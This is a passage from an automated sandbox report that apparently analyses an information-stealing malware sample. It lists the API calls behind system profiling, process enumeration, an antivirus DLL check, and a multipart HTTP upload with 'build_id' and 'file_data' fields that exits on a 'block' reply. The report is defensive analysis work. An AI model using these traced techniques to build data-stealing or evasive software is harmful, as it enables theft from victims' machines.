Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Strings

ERROR, xrefs: 00086AB6
ERROR, xrefs: 00086BAB
GET, xrefs: 00086A42

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 3863758870-2509457195
Opcode ID: d99cee89bdbbd3916466174a522e6b101801ceeaad78763a37e78f25b2aa7ac1
Instruction ID: 9da8bd3faff0bc8f3e75d8bb8860fdef2063c6f83bad84a6b0d5a270739fb48f
Opcode Fuzzy Hash: d99cee89bdbbd3916466174a522e6b101801ceeaad78763a37e78f25b2aa7ac1
Instruction Fuzzy Hash: D6517C71900169AFDF60AB60EC85BEEB7F8FB04344F0181E2F588AA051DF315E859F90

Function 00090DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

GetKeyboardLayoutList.USER32(00000000,00000000,000B670D,?,?), ref: 00090E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00090E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00090E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00090E57

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

LocalFree.KERNEL32(00000000), ref: 00090EFF

Strings

/ , xrefs: 00090E73

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 1590ab77ae9149f1e5dd9ee26612938ed27ce78ad043baa10c4f118894cb9d0b
Instruction ID: 0b4fdea50364aaa3ca0ef055f64604c6684afb54e10b891c42b883b9f4beecf8
Opcode Fuzzy Hash: 1590ab77ae9149f1e5dd9ee26612938ed27ce78ad043baa10c4f118894cb9d0b
Instruction Fuzzy Hash: 36312AB1900228AFDF60AF64EC8DBDEB3B8BB04300F5145E5F519A7112DB746E859F60

Function 0009257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00092589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00097E31,.exe,000B6CCC,000B6CC8,000B6CC4,000B6CC0,000B6CBC,000B6CB8,000B6CB4,000B6CB0,000B6CAC,000B6CA8,000B6CA4), ref: 000925A8
Process32First.KERNEL32(00000000,00000128), ref: 000925B8
Process32Next.KERNEL32(00000000,00000128), ref: 000925CA
StrCmpCA.SHLWAPI(?), ref: 000925DC
CloseHandle.KERNEL32(00000000), ref: 000925F0

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: f137533b1481651b34e2b82b1f21e3654c2c1180eae2e4cc031dcd3b2bf6e2fd
Instruction ID: 572734618c5a63cf7976960ab432d9d7e3c0c790c8f53a5da9d8091eceb4c6f2
Opcode Fuzzy Hash: f137533b1481651b34e2b82b1f21e3654c2c1180eae2e4cc031dcd3b2bf6e2fd
Instruction Fuzzy Hash: 36014471901515AFEF61ABA0EC08FEE77F89F15341F4500E6E449D6151EA348F80EB21

Function 000914A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000B6712,?,?), ref: 000914D4
Process32First.KERNEL32(00000000,00000128), ref: 000914E4
Process32Next.KERNEL32(00000000,00000128), ref: 00091542
CloseHandle.KERNEL32(00000000), ref: 0009154D

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: 995484ff8835bbb93ff565b4c641ddbc469166401c84752203136c6eed6def95
Instruction ID: c007a1a97f84c45d803fdf03a9caebf0f8393248836e03303be44ed31e862b72
Opcode Fuzzy Hash: 995484ff8835bbb93ff565b4c641ddbc469166401c84752203136c6eed6def95
Instruction Fuzzy Hash: 10118271A00218DBDF21BB64EC85BEE73F8AF48300F410092F915A7242DB34AE45AB60

Function 00090D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00090D49
HeapAlloc.KERNEL32(00000000), ref: 00090D50
GetTimeZoneInformation.KERNEL32(?), ref: 00090D5F
wsprintfA.USER32 ref: 00090D7D

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 201e246ae3e26b914354da7ada59eb693cd846cf6a0324f0e89735fae7bd975a
Instruction ID: c61f81c77117dacaa888e8b54464f22874f0b90b6e8fdca27ae5304925ef5fb1
Opcode Fuzzy Hash: 201e246ae3e26b914354da7ada59eb693cd846cf6a0324f0e89735fae7bd975a
Instruction Fuzzy Hash: D8F0E970E02224ABEF00BBB4FC4DBAB77A9AB04724F010296F511DB1D0EB74AD448785

Function 00090C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000813B9), ref: 00090C5F
HeapAlloc.KERNEL32(00000000,?,?,?,000813B9), ref: 00090C66
GetUserNameA.ADVAPI32(00000000,000813B9), ref: 00090C7A

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19b12e27b408fedd3f1aecd895deb9dbc066a9d03c0706b0a70d6b816f4924a5
Instruction ID: 46f6f6a4854f9c22b358bc9cd775c7e105b34a502e152181573e837e2d540446
Opcode Fuzzy Hash: 19b12e27b408fedd3f1aecd895deb9dbc066a9d03c0706b0a70d6b816f4924a5
Instruction Fuzzy Hash: 84D012B5214204BBE7406795DC4DFCF76BCD784715F000155B645D2250D5B499448720

Function 00090FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00090FD4
wsprintfA.USER32 ref: 00090FEC

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 34170051762bed44882e0262e10a55cc7c14cc1bc92eec3b91dc94465441f61b
Instruction ID: 14ae814d50b1fcb73319cdecdc0a9617894559446ec835c8b0bcfd66c61ee550
Opcode Fuzzy Hash: 34170051762bed44882e0262e10a55cc7c14cc1bc92eec3b91dc94465441f61b
Instruction Fuzzy Hash: 1DE06D70D5020D9BCF01EF60EC49AEEB7BCAB04204F4105A69505A7180D670AB899B40

Function 000814AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00081503,avghookx.dll,00098544), ref: 000814DF

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 3b1bb72c9df4be2e7479d90a394bdc70025f8fa9e2a1d30c7d262fc2874ed4b4
Instruction ID: 21f00ad1840d4b5568c7e60a86a9979b763451e775197b2422a8f43977144ce6
Opcode Fuzzy Hash: 3b1bb72c9df4be2e7479d90a394bdc70025f8fa9e2a1d30c7d262fc2874ed4b4
Instruction Fuzzy Hash: 24F03432A00150ABCB20DF59D804AAAFBB8EB43760F257054E84AB3200C730ED12AA98

Function 00085482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E

lstrlenA.KERNEL32(?), ref: 00085519

Part of subcall function 00091E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,002DE908,?,?,?,000928A1,?,?,00000000), ref: 00091E7D
Part of subcall function 00091E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,000928A1,?,?,00000000), ref: 00091E8A
Part of subcall function 00091E5D: HeapAlloc.KERNEL32(00000000,?,?,?,000928A1,?,?,00000000), ref: 00091E91

StrCmpCA.SHLWAPI(?,000B6986,000B697B,000B697A,000B696F), ref: 00085588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000855AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000856C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00085704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00085736

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

lstrlenA.KERNEL32(?,",file_data,000B7850,------,000B7844,?,",000B7838,------,000B782C,2ee1445fc63bc20d0e7966867b13e0e1,",build_id,000B7814,------), ref: 00085C67
lstrlenA.KERNEL32(?), ref: 00085C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00085C92
HeapAlloc.KERNEL32(00000000), ref: 00085C99
lstrlenA.KERNEL32(?), ref: 00085CA6
_memmove.LIBCMT ref: 00085CB4
lstrlenA.KERNEL32(?,?,?), ref: 00085CC9
_memmove.LIBCMT ref: 00085CD6
lstrlenA.KERNEL32(?), ref: 00085CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00085CF2
_memmove.LIBCMT ref: 00085D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00085D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00085D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00085D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00085E26
StrCmpCA.SHLWAPI(?,block), ref: 00085E3B
ExitProcess.KERNEL32 ref: 00085E46

Strings

------, xrefs: 000859FF
", xrefs: 0008581B
------, xrefs: 0008573C
ERROR, xrefs: 00085F2F
block, xrefs: 00085E30
", xrefs: 00085AD8
2ee1445fc63bc20d0e7966867b13e0e1, xrefs: 000859A7
build_id, xrefs: 0008594F
", xrefs: 0008597B
